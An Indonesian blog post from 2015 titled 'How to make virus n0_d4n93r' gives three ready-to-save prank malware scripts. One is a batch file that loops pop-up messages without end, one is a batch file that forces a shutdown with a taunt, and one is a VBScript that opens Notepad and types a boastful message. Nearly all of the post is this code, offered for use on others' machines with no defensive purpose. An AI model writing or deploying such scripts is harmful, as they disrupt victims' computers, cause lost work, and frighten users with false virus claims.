Jumat, 17 April 2015

Cara membuat Virus n0_d4n93r

Langsung ke topik :
1. No ending message
@echo off
:A
msg * Your computer is filled with virus like me.
msg * Your computer is filled with virus like me.
msg * Your computer is filled with virus like me.
msg * Your computer is filled with virus like me.
msg * Your computer is filled with virus like me.
msg * Your computer is filled with virus like me.
goto A

save file .bat

2. Shutdown with message
@echo off
msg * Executing Shutdown immediately...
msg * Shutdown Executed in...
msg * 3
msg * 2
msg * 1
shutdown -s -c "HAHAHA"

save file .bat

3. Ghost Notepad
WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 10
WshShell.AppActivate “Notepad”
WScript.Sleep 50
WshShell.SendKeys “No”
WScript.Sleep 50
WshShell.SendKeys “one ”
WScript.Sleep 50
WshShell.SendKeys “can”
WScript.Sleep 50
WshShell.SendKeys “def”
WScript.Sleep 50
WshShell.SendKeys “eat ”
WScript.Sleep 50
WshShell.SendKeys ” me”
WScript.Sleep 50
WshShell.SendKeys “!!”

save file .vbs

Tidak ada komentar:

Posting Komentar